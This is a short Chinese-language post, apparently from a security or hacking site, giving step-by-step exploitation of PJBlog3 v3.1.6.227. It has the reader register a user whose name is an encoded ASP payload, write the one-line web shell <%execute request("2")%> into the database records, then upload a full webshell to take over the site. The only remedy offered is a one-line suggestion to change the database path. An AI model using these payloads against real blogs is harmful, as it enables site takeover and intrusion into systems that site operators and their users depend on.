PJBlog3 v3.1.6.227 漏洞及解决方案
1.查看默认数据库blogDB/PBLog3.asp是否存在!
2。注册个ID
3。以┼攠數畣整爠煥敵瑳∨≒┩眾┼砧 这个为名 密码随便下
4。在到用户管理位置找到 你注册的用户 在把这个 |||┠砾。“:%>x”unicode压缩后“┠砾” 都复制到所有记录里 最后在插入一句话<%execute request("2")%>确定提交
5。在用一句话连接 上传WEBSHELL 拿下此站点
解决方案:修改数据库路径
上一篇:网钛文章管理系统0day上传漏洞